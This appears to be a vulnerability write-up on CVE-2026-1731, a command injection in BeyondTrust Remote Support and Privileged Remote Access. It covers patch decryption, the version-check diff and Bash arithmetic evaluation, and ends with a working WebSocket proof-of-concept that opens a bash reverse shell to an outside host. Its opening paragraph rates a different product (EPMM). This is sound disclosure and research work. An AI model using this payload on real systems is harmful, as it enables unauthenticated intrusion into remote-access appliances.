The security firm watchTowr published an excellent technical writeup that includes a proof-of-concept exploit, and a Rapid7 Metasploit module PR has been opened. I’ve rated ‘Attacker Value’ as ‘Very High’, since breaching EPMM also results in the compromise of sensitive information held by the many devices managed by it. I’ve rated ‘Exploitability’ as ‘Very High’, since the attack vector is a web API request and the bug class is a reliable one.

Technical Analysis

Overview

On February 6, 2026, BeyondTrust published an advisory for a new critical command injection vulnerability, CVE-2026-1731, affecting their products Remote Support (RS) and Privileged Remote Access (PRA).

Rapid7 Labs has reproduced this new vulnerability. Notably, this new vulnerability is in the exact same endpoint as a previous high profile vulnerability CVE-2024-12356. While CVE-2024-12356 was exploited in-the-wild as a zero-day, this new vulnerability was reported to the vendor through coordinated disclosure, and there is no known exploitation in-the-wild at this time. The similarity, at a technical level, between the two issues highlights how critical this new vulnerability is in terms of exploitability, and the high value that targeting a solution like RS or PRA is to an attacker.

The following technical analysis details CVE-2026-1731. Our prior analysis of CVE-2024-12356 is recommended reading to better understand the target architecture and how to communicate to the affected endpoint.

Analysis

We begin by extracting the patch for CVE-2026-1731 – a file called BT26-02-RS.nss. We know from our prior analysis of CVE-2024-12356 that these patches are encrypted with a static key. Decrypting and extracting the contents of the patch reveals a number of interesting files; ./pre_scripts/bt26-02.sh, ./resources/thinA, ./resources/thinB, and ./resources/thinD.

sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ openssl enc -d -in BT26-02-RS.nss  -md sha1 -pass pass:"Bingb0ng, what she said; the Tw1st3d switch is RED" -aes-256-cbc > ./BT26-02-RS.tar 2>/dev/null
sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ tar -xvf BT26-02-RS.tar 
cert_chain.pem
content
signature
signature.sha256
sne.version
sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ cat content | gunzip - | tar -xv
install
application_patch.conf
ingredi_patch.conf
pre_scripts/
pre_scripts/bt26-02.sh
resources/
resources/thinA
resources/thinB
resources/thinD
sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ ls -al
total 80
drwxrwxr-x 4 sfewer sfewer  4096 Feb 10 12:53 .
drwxrwxr-x 4 sfewer sfewer  4096 Feb 10 12:52 ..
-rw-r--r-- 1 sfewer sfewer   361 Feb  4 06:00 application_patch.conf
-rw------- 1 sfewer sfewer 11104 Feb 10 08:30 BT26-02-RS.nss
-rw-rw-r-- 1 sfewer sfewer 11081 Feb 10 12:53 BT26-02-RS.tar
-rw-r--r-- 1 sfewer sfewer  1846 Feb  4 06:00 cert_chain.pem
-rw-r--r-- 1 sfewer sfewer  8099 Feb  4 06:00 content
-rw-r--r-- 1 sfewer sfewer    45 Feb  4 06:00 ingredi_patch.conf
-rwxr--r-- 1 sfewer sfewer  7366 Feb  4 06:00 install
drwxr-xr-x 2 sfewer sfewer  4096 Feb  4 06:00 pre_scripts
drwxr-xr-x 2 sfewer sfewer  4096 Feb  4 06:00 resources
-rw-r--r-- 1 sfewer sfewer   512 Feb  4 06:00 signature
-rw-r--r-- 1 sfewer sfewer   512 Feb  4 06:00 signature.sha256
-rw-r--r-- 1 sfewer sfewer     2 Feb  4 06:00 sne.version
sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ ls -al ./resources/
total 44
drwxr-xr-x 2 sfewer sfewer  4096 Feb  4 06:00 .
drwxrwxr-x 4 sfewer sfewer  4096 Feb 10 12:53 ..
-rw-r--r-- 1 sfewer sfewer 10570 Feb  4 06:00 thinA
-rw-r--r-- 1 sfewer sfewer 10619 Feb  4 06:00 thinB
-rw-r--r-- 1 sfewer sfewer 10570 Feb  4 06:00 thinD

Examining the bt26-02.sh shell script we can see that this script will patch the destination file $BG_app_root/app/thin-scc-wrapper with one of the three “thin” resource files – depending on the current version of the product. As our test system is running version 24.1.2 we will explore the file ./resources/thinB. We can note that the destination thin-scc-wrapper script is where CVE-2024-12356 was located, and is reachable by an unauthenticated attacker via a WebSocket connection.

#!/bin/bash

# grab a few vars from the database
BUILD_COMMIT_NUM=$($BG_database_primary_cmd -t -c "select value from fixed_config where variable = 'build_commit_num'")
BUILD_COMMIT_HASH=$($BG_database_primary_cmd -t -c "select value from fixed_config where variable = 'build_commit_hash'")
BUILD_DATE=$($BG_database_primary_cmd -t -c "select value from fixed_config where variable = 'build_date'")

# sedcp,  lifted pretty much directly from mkar with only the vars we care about
function sedcp # <srcfile> <destfile>
{
    src=$1
    shift 1

    dest=$1
    shift 1

    SED_EXPRS="
		s^%COMPANY%^$BG_company^g;
		s^%PRODUCT%^$BG_product^g;
		s^%VERSION%^$BG_version^g;
		s^%BUILD_VERSION%^$BG_version^g;
		s^%BUILD_COMMIT_NUM%^$BUILD_COMMIT_NUM^g;
		s^%BUILD_COMMIT_HASH%^$BUILD_COMMIT_HASH^g;
		s^%BUILD_DATE%^$BUILD_DATE^g;
    "

    sed -e "$SED_EXPRS" "$src" >"$dest"
}

function compare_versions #     a.b.c[suffix]   x.y.z[suffix]  (the first one may be "UNKNOWN")
{
        # this function compares the version string in $1 to the version string in $2 and returns
        #  <0 if $1<$2
        # ==0 if $1==$2
        #  >0 if $1>$2

        if [[ -z "$1"  || "$1" == "UNKNOWN" ]]; then
                # "" or UNKNOWN is less than anything on the right
                echo -1
                return
        fi

        if [[ "$1" == "$2" ]]; then
                echo 0
                return
        fi

        # the complex sed is to retain only the numeric version and strip off any given suffix from the version string
        v1=$(echo "$1" | sed -e 's/^\([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\)[^0-9].*/\1/')
        v2=$(echo "$2" | sed -e 's/^\([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\)[^0-9].*/\1/')
        ver1=$(printf "%d%03d%03d" $(echo "$v1" | cut -f1 -d.) $(echo "$v1" | cut -f2 -d.) $(echo "$v1" | cut -f3 -d.) )
        ver2=$(printf "%d%03d%03d" $(echo "$v2" | cut -f1 -d.) $(echo "$v2" | cut -f2 -d.) $(echo "$v2" | cut -f3 -d.) )

        echo $(( $ver1 - $ver2 ))
}

# patch between 25.2.1 and  25.3.1 inclusive
if [[ $(compare_versions $BG_version "25.2.1") -ge 0 ]] && [[ $(compare_versions $BG_version "25.3.1") -le 0 ]]; then
	echo Copying thinA over $BG_app_root/app/thin-scc-wrapper
	sedcp resources/thinA $BG_app_root/app/thin-scc-wrapper
	
	exit 0
fi

# patch between 23.2.1 and 25.1.5 inclusive
if [[ $(compare_versions $BG_version "23.2.1") -ge 0 ]] && [[ $(compare_versions $BG_version "25.1.5") -le 0 ]]; then
	echo Copying thinB over $BG_app_root/app/thin-scc-wrapper
	sedcp resources/thinB $BG_app_root/app/thin-scc-wrapper
	
	exit 0
fi

# patch between 21.3.1 and 22.3.4 inclusive
if [[ $(compare_versions $BG_version "21.3.1") -ge 0 ]] && [[ $(compare_versions $BG_version "22.3.4") -le 0 ]]; then
	echo Copying thinD over $BG_app_root/app/thin-scc-wrapper
	sedcp resources/thinD $BG_app_root/app/thin-scc-wrapper
	
	exit 0
fi

Diffing thinB against thin-scc-wrapper, shows a sanity check has been added to the attacker controlled input for a remote version number. The new sanity check ensures the version number is actually a number, and only contains numerical characters. With this in mind, we now need to explore how this could lead to command injection.

@@ -48,6 +48,12 @@ blog "reading remoteVersion"
 read -t 30 remoteVersion || exit 1
 blog "read remoteVersion as [$remoteVersion]"
 
+# Validate remote version is a number (single or two-digit)
+if [[ ! "$remoteVersion" =~ ^[0-9]{1,2}$ ]]; then
+    blog "ERROR: Invalid remote version - must be a 1-2 digit number"
+    exit 1
+fi
+

The thin-scc-wrapper script will read and process the versionNumber variable as follows:

# read their version number
read -t 30 remoteVersion || exit 1
blog "read remoteVersion as [$remoteVersion]"

# Assuming that the thin clients will be the more knowledgable of
# speaking older protocol versions.  They can look at the server version
# and adjust to match easier than the trymax side.
version=""
if [[ "$localVersion" -lt "$remoteVersion" ]]; then
	version=$localVersion
else
	version=$remoteVersion
fi

# now we both agree on the protocol version

# =================================================================================================
# =================================================================================================
# =================================================================================================

if [[ $version -gt "$localVersion" ]]; then
	blog "unhandled protocol version [$version]"
	exit 1
fi

The command injection is present here but it is not immediately obvious unless you are very familiar with the nuances of Bash arithmetic evaluation. To assist us, we ask Gemini. The following Gemini response explains the problem very clearly:

Yes, there is a potential command injection (or more accurately, arbitrary code execution) vulnerability in this script.

While it looks like a simple numeric comparison, the way Bash handles the [[ ... ]] construct with the -lt (less than) and -gt (greater than) operators involves Arithmetic Evaluation.

The Vulnerability: Arithmetic Evaluation
In Bash, when using arithmetic operators like -lt, -gt, or -eq inside [[ ]], the shell treats the operands as expressions. If an attacker can control the value of remoteVersion, they can pass a string that Bash will evaluate as code.

How an attacker would exploit it:
If an attacker provides a payload like:
remoteVersion='a[$(touch /tmp/pwned)]0'

When the script reaches this line:
if [[ "$localVersion" -lt "$remoteVersion" ]]; then

Bash evaluates remoteVersion. Because it sees the structure of an array index or an expression, it executes the command inside the subshell $(...) to determine the value.

Interestingly, a recent analysis by watchTowr for a different vulnerability in a different product (CVE-2026-1281 in Ivanti EPMM), published January 30, 2026, also shows a similar root cause due to arithmetic evaluation. We can note that the original finders of CVE-2026-1731, Hacktron, are using “AI-enabled variant analysis” for vulnerability discovery, so the recent work in this area may have helped their discovery, as they cite a date of January 31, 2026 as the discovery date – one day after the watchTowr analysis of CVE-2026-1281.

We now know that we can execute an arbitrary OS command by supplying a malicious version number as part of a WebSocket request, whereby the malicious version number will be in the form a[$(touch /tmp/pwned)].

We can construct a PoC for CVE-2026-1731 by modifying the PoC from our prior analysis. We need to connect to the WebSocket URI /nw. The remote service, i.e. the thin-scc-wrapper script, expects us to transmit a newline delimited sequence comprising a version number, a UUID for the “thin mint” cookie value, an authentication type, and a “gskey” value.

As we want to place our command injection in the version number, we construct our PoC as follows, with a bash reverse shell as the payload. The header value X-Ns-Company must be set to the target appliance’s company name (We have previously shown in our Metasploit module for CVE-2024-12356 how to programmatically extract the company name).

Note: the below $ is escaped as \$ as we are running this on the command line.

echo -ne "hax[\$(/bin/bash -i >& /dev/tcp/192.168.1.23/4444 0>&1)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | ./websocat -k wss://192.168.1.105:443/nw --protocol "ingredi support desk customer thin" -H "X-Ns-Company: myexamplecompany" --binary -n -

An NCat listener will catch the reverse shell.

Remediation

BeyondTrust has released patches to remediate CVE-2026-1731 for the following versions:

  • Privileged Remote Access (PRA) version 24.3.4 and earlier
    • Patch BT26-02-PRA
  • Remote Support (RS) version 25.3.1 and earlier
    • Patch BT26-02-RS

BeyondTrust customers are urged to apply this patch on an urgent basis.

References

View More Activity  Next >